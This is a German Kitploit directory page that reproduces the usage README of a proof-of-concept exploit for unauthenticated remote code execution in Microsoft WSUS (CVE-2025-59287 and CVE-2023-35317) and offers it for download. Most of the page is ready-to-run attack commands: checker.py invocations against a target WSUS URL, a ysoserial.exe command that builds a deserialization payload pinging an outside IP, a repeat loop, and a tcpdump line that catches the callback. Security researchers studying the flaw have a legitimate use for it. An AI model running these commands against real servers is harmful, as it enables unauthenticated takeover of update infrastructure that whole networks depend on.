Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/m507/cve-2025-59287-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

Unauthentifizierte RCE-PoC im Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317

Repository anzeigen
1431vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59287 / CVE-2023-35317 PoC

In CVE-2025-59287: SoapFormatter RCE in WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/

Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wo dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.

Verwendung

Erforderliche Flags:

  • --target-url – Basis-URL des Ziel-WSUS-Servers, z. B. http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – Einer von CVE-2023-35317 oder CVE-2025-59287

Optionale Flags:

  • --dns-name – Client-DNS-Name, der in SOAP-Anfragen verwendet wird (Standard: )
bugcrowd.local
  • --random – Stelle --dns-name ein zufälliges Subdomain voran, sodass jeder Lauf als neuer Client erscheint
  • --payload – Benutzerdefiniertes base64-kodiertes ysoserial-Payload; falls weggelassen, wird ein eingebautes Payload für das gewählte --cve verwendet
  • --debug – Aktiviere ausführliches Debug-Logging ([DEBUG]-Zeilen)
  • CVE-2025-59287

    1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

    alt text

    Manuelle Auslösung – CVE-2023-35317

    1. (Optional) Generieren Sie ein Payload mit Ysoserial.Net, wenn Sie das eingebaute nicht verwenden möchten (oder sich auf das eingebaute Payload verlassen).
    2. Führen Sie aus: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
    3. Öffnen Sie die WSUS-Konsole

    alt text

    Automatische Auslösung – CVE-2023-35317

    1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (oder verlassen Sie sich auf das eingebaute Payload für --cve CVE-2023-35317)
    2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
    3. Warten Sie 1-3 Minuten, und es wird unter dem Dienstprozess erscheinen.
    4. Überwachen Sie ICMP-Verbindungen: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

    alt text

    Tool herunterladen